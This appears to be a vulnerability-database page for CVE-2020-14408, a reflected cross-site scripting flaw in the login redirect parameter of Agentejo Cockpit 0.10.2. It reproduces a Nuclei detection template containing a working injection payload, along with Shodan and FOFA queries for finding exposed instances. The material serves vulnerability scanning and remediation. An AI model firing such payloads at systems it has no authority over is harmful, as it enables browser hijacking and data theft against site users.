CVE-2020-14408: Agentejo Cockpit 0.10.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Agentejo Cockpit | POC: 已公开

漏洞描述

Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.

PoC代码[已公开]

id: CVE-2020-14408

info:
  name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/agentejo/cockpit/issues/1310
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-14408
    cwe-id: CWE-79
    epss-score: 0.01606
    epss-percentile: 0.811
    cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: agentejo
    product: cockpit
    shodan-query:
      - http.favicon.hash:688609340
      - http.html:"cockpit"
    fofa-query:
      - icon_hash=688609340
      - body="cockpit"
  tags: cve2020,cve,cockpit,agentejo,xss,oss

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "redirectTo = '/92874';alert(document.domain)//280';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ccc5bef3f0eed8ba276f57648e7118b346e980b8e05054601817e1bc727974d702205f5497b4f0eef109b00ff489b7c490bc6e066258fd28f2d1b64d04fbaf789aa7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐